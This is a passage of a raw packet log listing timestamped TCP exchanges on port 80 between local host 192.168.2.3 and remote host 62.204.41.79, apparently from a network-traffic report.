                                              Dec 13, 2022 20:09:18.001925945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002037048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002150059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002279043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002521038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002576113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002676010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002785921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.002919912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003004074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003106117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003211975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003328085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003454924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.003578901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.013112068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.013293982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.013539076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.013703108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.013880014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.014050007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.014147997 CET4974780192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.014151096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.018637896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.018901110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.019021988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.019265890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.019422054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.019726038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.019987106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.020250082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.020495892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.020749092 CET4974880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.020850897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.020972013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021096945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021205902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021323919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021433115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021569014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021677971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021833897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.021959066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022068024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022192955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022375107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022445917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022573948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.022691011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024080038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024195910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024327040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024437904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024559975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024678946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024796009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.024908066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025027037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025235891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025284052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025423050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025609970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025712013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025823116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.025919914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.027731895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.027899027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.027997971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028098106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028182983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028286934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028420925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028518915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028624058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028709888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028805971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.028903961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029006004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029119015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029232025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029314041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029408932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029556036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029656887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029752970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029838085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.029925108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030019999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030167103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030251980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030338049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030426979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030514002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030607939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030695915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030781031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030874014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.030970097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031090021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031265020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031265020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031390905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031497002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031603098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031733990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031832933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.031930923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032017946 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032118082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032238960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032316923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032411098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032526970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032635927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032728910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032835007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.032998085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.033147097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.045494080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.045871019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046051025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046184063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046328068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046451092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046576977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046709061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.046938896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047092915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047228098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047452927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047590017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047729015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047862053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.047996044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.048261881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.048373938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.048661947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.048727989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.051484108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.051676035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.051810980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052112103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052241087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052381992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052566051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052758932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.052911043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053030968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053153992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053335905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053478956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053597927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053714991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.053831100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.054030895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.054364920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.054488897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.054600954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.058634996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.058743000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.058928967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059045076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059133053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059233904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059324980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059423923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059514046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059613943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059698105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.059801102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.059891939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.060003042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.060158014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.060180902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.060281038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.060870886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.060898066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.060919046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.061295986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.061319113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.061336040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062052965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062104940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062123060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062139988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062433958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062541962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062618971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.062992096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.063009024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.063589096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.063611031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.063663960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.064258099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.064286947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.071806908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072041988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072149992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072253942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072380066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072467089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072566032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072654009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072746992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072844982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.072938919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073033094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073120117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073221922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073319912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073409081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073506117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073604107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073694944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073792934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073884010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.073971033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.073992968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.074110031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.074198008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.074538946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.074984074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.075251102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.075278044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.075401068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.075701952 CET804974762.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.075720072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.075736046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.075773001 CET4974780192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.079452991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.079472065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080096006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080112934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080128908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080240011 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080466032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080487013 CET804974862.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080773115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.080867052 CET4974880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.081021070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.081576109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.081593037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.081666946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.081743956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.081957102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082201004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082268953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082387924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082546949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082669020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082787037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.082917929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.083930016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.083945990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.083960056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.084765911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.084779978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.084826946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.084990025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085061073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085253000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085308075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085387945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085679054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.085952044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.086033106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.086188078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.086227894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.086309910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.086347103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088458061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088485956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088500977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088603020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088619947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088795900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088876009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.088995934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.089049101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.089154959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.089358091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.089375973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.089474916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090209961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090228081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090271950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090439081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090516090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090579987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090599060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090624094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090797901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.090816021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091039896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091077089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091097116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091114998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091145992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091192961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091439962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091458082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.091680050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092148066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092356920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092458963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092461109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092484951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092500925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092520952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092536926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092556000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092572927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092586994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092590094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092607021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092734098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092766047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092858076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.092859030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092878103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.092955112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.093059063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093060970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.093111992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093163967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.093261957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093280077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093482971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.093518019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093568087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.093621969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:18.093858004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094111919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094207048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094368935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094460011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094568968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094657898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094754934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094842911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.094940901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095041037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095139027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095293999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095331907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095418930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095515966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.095601082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.099653959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.099849939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.099982977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100156069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100261927 CET4974880192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100265980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100388050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100476980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:18.100564003 CET4973680192.168.2.362.204.41.79
